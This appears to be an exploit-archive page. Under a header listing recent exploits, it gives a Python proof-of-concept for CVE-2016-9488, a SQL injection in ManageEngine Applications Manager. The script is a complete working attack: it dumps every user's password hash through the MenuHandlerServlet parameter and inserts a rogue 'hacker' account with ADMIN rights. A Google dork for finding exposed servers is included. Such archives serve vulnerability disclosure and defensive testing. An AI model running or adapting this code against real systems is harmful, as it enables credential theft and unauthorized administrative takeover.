
32 changes to exploits/shellcodes Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite) Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter) DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated) ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) Bludit 3.9.2 - Directory Traversal LibreHealth 2.0.0 - Authenticated Remote Code Execution Online Course Registration 1.0 - Unauthenticated Remote Code Execution elaniin CMS - Authentication Bypass Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting Bio Star 2.8.2 - Local File Inclusion Webtareas 2.1p - Arbitrary File Upload (Authenticated) F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication) Socket.io-file 2.0.31 - Arbitrary File Upload pfSense 2.4.4-p3 - Cross-Site Request Forgery Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting Rails 5.0.1 - Remote Code Execution Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) Windows/x86 - Download using mshta.exe Shellcode (100 bytes)
95 lines
No EOL
3.2 KiB
Python
Executable file
95 lines
No EOL
3.2 KiB
Python
Executable file
# Exploit Title: ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection
|
|
# Google Dork: intitle:"Applications Manager Login Screen"
|
|
# Date: 2020-07-23
|
|
# Exploit Author: aldorm
|
|
# Vendor Homepage: https://www.manageengine.com/
|
|
# Software Link:
|
|
# Version: 12 and 13 before Build 13200
|
|
# Tested on: Windows
|
|
# CVE : 2016-9488
|
|
|
|
#!/usr/bin/env python2
|
|
|
|
# App: ManageEngine Applications Manager
|
|
# Versions: 12 and 13 before build 13200
|
|
# CVE: CVE-2016-9488
|
|
# Vuln Type: SQL Injection
|
|
# CVSSv3: 9.8
|
|
#
|
|
# PoC Autor: aldorm
|
|
# Release date: 23-07-2020
|
|
|
|
# ./poc_CVE-2016-9488.py 192.168.123.113 8443 --create-user-hacker
|
|
# [*] Extracting all users:
|
|
# admin:21232f297a57a5a743894a0e4a801fc3
|
|
# reportadmin:21232f297a57a5a743894a0e4a801fc3
|
|
# systemadmin_enterprise:21232f297a57a5a743894a0e4a801fc3
|
|
# [*] Creating new user:
|
|
# User: hacker
|
|
# Password: admin
|
|
# [*] Verifing created user...
|
|
# Success.
|
|
|
|
|
|
import sys
|
|
import requests
|
|
import urllib3
|
|
import json
|
|
|
|
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
target = 'localhost'
|
|
|
|
def get_userpassword():
|
|
sqli = ' UNION ALL SELECT userid,CONCAT(username,$$:$$,password),NULL FROM am_userpasswordtable--'
|
|
r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);
|
|
j = json.loads(r.text)
|
|
return j
|
|
|
|
def create_user():
|
|
sqli = '; INSERT INTO am_userpasswordtable VALUES (123123123, $$hacker$$,$$21232f297a57a5a743894a0e4a801fc3$$,NULL,NULL,$$21232f297a57a5a743894a0e4a801fc3$$,1); -- '
|
|
r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);
|
|
|
|
sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$USERS$$); -- '
|
|
r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);
|
|
|
|
sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$ADMIN$$); -- '
|
|
r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);
|
|
|
|
return
|
|
|
|
|
|
def main ():
|
|
if not len(sys.argv) > 2:
|
|
print "Usage %s <target> <port> [--create-user-hacker]" % sys.argv[0]
|
|
print "e.g. %s manageengine 8443 " % sys.argv[0]
|
|
sys.exit(1)
|
|
|
|
global target
|
|
global port
|
|
target=sys.argv[1]
|
|
port=sys.argv[2]
|
|
|
|
print "[*] Extracting all users:"
|
|
j = get_userpassword()
|
|
for user in j["0"]:
|
|
print "\t %s" % user[1]
|
|
|
|
|
|
if len(sys.argv) == 4 and sys.argv[3] == '--create-user-hacker':
|
|
print "[*] Creating new user: \n\tUser: hacker \n\tPassword: admin"
|
|
create_user()
|
|
print "[*] Verifing created user..."
|
|
|
|
j = get_userpassword()
|
|
for user in j["0"]:
|
|
if user[1] == "hacker:21232f297a57a5a743894a0e4a801fc3":
|
|
print "Success."
|
|
return
|
|
print "User not created."
|
|
|
|
|
|
|
|
if __name__ == '__main__':
|
|
main() |